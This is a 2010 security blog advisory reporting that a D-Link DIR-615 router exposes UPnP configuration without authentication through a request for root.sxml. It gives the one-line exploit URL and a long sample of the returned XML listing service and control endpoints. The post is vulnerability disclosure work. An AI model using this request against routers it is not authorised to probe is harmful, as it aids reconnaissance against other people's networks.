• Skip to content
  • Skip to primary sidebar

Information Security Expert Blog

Dr. Ali Jahangiri

Device Information

D-link DIR-615 Device Information and Configuration Vulnerability

October 31, 2010 By Ali Jahangiri

Overview:
General device configuration and information such as UDN, services, service ID, Control URL and other detailed information from a D-Link DIR-615 Wireless N 300 router can be accessed by fetching root.sxml using a web browser.

Description:
Attacker can gain remote access to the D-Link DIR-615 Wireless N 300 router, general device information and configuration by fetching root.sxml file.

Exploit Syntax: http://deviceIP/root.sxml

Exploit Output for device with IP 192.168.150.1:

−<root>
−<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<URLBase>http://192.168.150.1</URLBase>
−<device>
−<deviceType>
urn:schemas-upnp-org:device:InternetGatewayDevice:1
</deviceType>
<presentationURL>/</presentationURL>
<friendlyName>Wireless N Router</friendlyName>
<manufacturer>D-Link Systems</manufacturer>
<manufacturerURL>http://www.dlink.com</manufacturerURL>
<modelDescription>Wireless N Router</modelDescription>
<modelName>Wireless N Router</modelName>
<modelNumber>DIR-615</modelNumber>
<modelURL>http://www.dlink.com</modelURL>
<serialNumber>none</serialNumber>
<UDN>uuid:280BA93F-BC7B-336E-8F78-733C78667090</UDN>
<UPC>00000-00001</UPC>
−<serviceList>
−<service>
<serviceType>urn:schemas-upnp-org:service:Layer3Forwarding:1</serviceType>
<serviceId>urn:upnp-org:serviceId:L3Forwarding1</serviceId>
<controlURL>http://192.168.150.1:4444/l3fw</controlURL>
<eventSubURL>http://192.168.150.1:9393/l3fw</eventSubURL>
<SCPDURL>http://192.168.150.1/l3fw.xml</SCPDURL>
</service>
</serviceList>
−<deviceList>
−<device>
<deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType>
<friendlyName>Wireless N Router</friendlyName>
<manufacturer>D-Link Systems</manufacturer>
<manufacturerURL>http://www.dlink.com</manufacturerURL>
<modelDescription>Wireless N Router</modelDescription>
<modelName>Wireless N Router</modelName>
<modelNumber>DIR-615</modelNumber>
<modelURL>http://www.dlink.com</modelURL>
<serialNumber>none</serialNumber>
<UDN>uuid:616CA787-7B12-39B7-836B-9DDF50280572</UDN>
<UPC>00000-00001</UPC>
−<serviceList>
−<service>
−<serviceType>
urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1
</serviceType>
<serviceId>urn:upnp-org:serviceId:WANCommonIFC1</serviceId>
<controlURL>http://192.168.150.1:4444/wcommifc</controlURL>
<eventSubURL>http://192.168.150.1:9393/wcommifc</eventSubURL>
<SCPDURL>http://192.168.150.1/WANCommonIFC1.xml</SCPDURL>
</service>
</serviceList>
−<deviceList>
−<device>
<deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType>
<friendlyName>Wireless N Router</friendlyName>
<manufacturer>D-Link Systems</manufacturer>
<manufacturerURL>http://www.dlink.com</manufacturerURL>
<modelDescription>Wireless N Router</modelDescription>
<modelName>Wireless N Router</modelName>
<modelNumber>DIR-615</modelNumber>
<modelURL>http://www.dlink.com</modelURL>
<serialNumber>none</serialNumber>
<UDN>uuid:C730E975-C618-3CC8-A0D8-92913DD5EC5E</UDN>
<UPC>00000-00001</UPC>
−<serviceList>
−<service>
<serviceType>urn:schemas-upnp-org:service:WANIPConnection:1</serviceType>
<serviceId>urn:upnp-org:serviceId:WANIPConn1</serviceId>
<controlURL>http://192.168.150.1:4444/wipconn</controlURL>
<eventSubURL>http://192.168.150.1:9393/wipconn</eventSubURL>
<SCPDURL>http://192.168.150.1/WANIPConn1.xml</SCPDURL>
</service>
</serviceList>
</device>
</deviceList>
</device>
−<device>
<deviceType>urn:schemas-wifialliance-org:device:WFADevice:1</deviceType>
<presentationURL>/</presentationURL>
<friendlyName>WFADevice</friendlyName>
<manufacturer>D-Link Systems</manufacturer>
<manufacturerURL>http://www.dlink.com</manufacturerURL>
<modelDescription>Wireless N Router</modelDescription>
<modelName>Wireless N Router</modelName>
<modelNumber>DIR-615</modelNumber>
<modelURL>http://www.dlink.com</modelURL>
<serialNumber>none</serialNumber>
<UDN>uuid:5B0240B4-5042-3757-A05A-51DBD8DF789E</UDN>
<UPC>00000-00001</UPC>
−<serviceList>
−<service>
−<serviceType>
urn:schemas-wifialliance-org:service:WFAWLANConfig:1
</serviceType>
<serviceId>urn:wifialliance-org:serviceId:WFAWLANConfig1</serviceId>
<controlURL>http://192.168.150.1:8832/wfawc</controlURL>
<eventSubURL>http://192.168.150.1:8456/wfawc</eventSubURL>
<SCPDURL>http://192.168.150.1/WFAwc.xml</SCPDURL>
</service>
</serviceList>
</device>
</deviceList>
</device>
</root>

Impact:
Important device information and general configuration will be revealed without proper authorization.

Solution:
I am currently unaware of a solution to this problem.

Vendor Information:
http://www.dlink.com/products/?pid=565

Product Details:
D-Link Wireless access point
Product Page DIR-615
Hardware Version :B2
Firmware Version: 2.25

CERT(R) Coordination Center Tracking Code: VU#944927 Date: 01/10/2010

Filed Under: D-Link, Vulnerability Tagged With: Configuration Vulnerability, D-Link, Device Information, DIR-615, router, Wireless N 300

Primary Sidebar

Recent Posts

  • Simple PHP Shell Script
  • MasterCard Australia: Untrusted SSL Certificate
  • How to Test Snort with Penetration Testing Tools
  • WordPress NextGEN Gallery Plugin; Directory Browsing Vulnerability
  • Koobface Gangs Investigative Report

Archives

Categories

Links

  • My Facebook Page
  • My Website
  • Privacy

RSS From LiveHacking.com

  • Nmap 7 Released!
  • Apple fixes security vulnerabilities in Safari, OS X, iOS and Apple TV
  • The OpenSSL project releases new versions of its software to squash 12 security vulnerabilities
  • FREAK vulnerability weakens secure Web sites
  • WP-Slimstat vulnerability exposes WordPress websites to SQL injection attacks
  • Google backpedals on its arbitrary vulnerability disclosure policy
  • Cross Site Scripting vulnerability found in IE 11
  • Apple updates iOS, OS X and Apple TV in monster patch release
  • Google discloses three more zero-day vulnerabilities, this time for OS X
  • Microsoft to fix Windows vulnerability that Google publicly disclosed last week

. Copyright 2007 - 2013 Information Security Expert Blog . All Rights Reserved .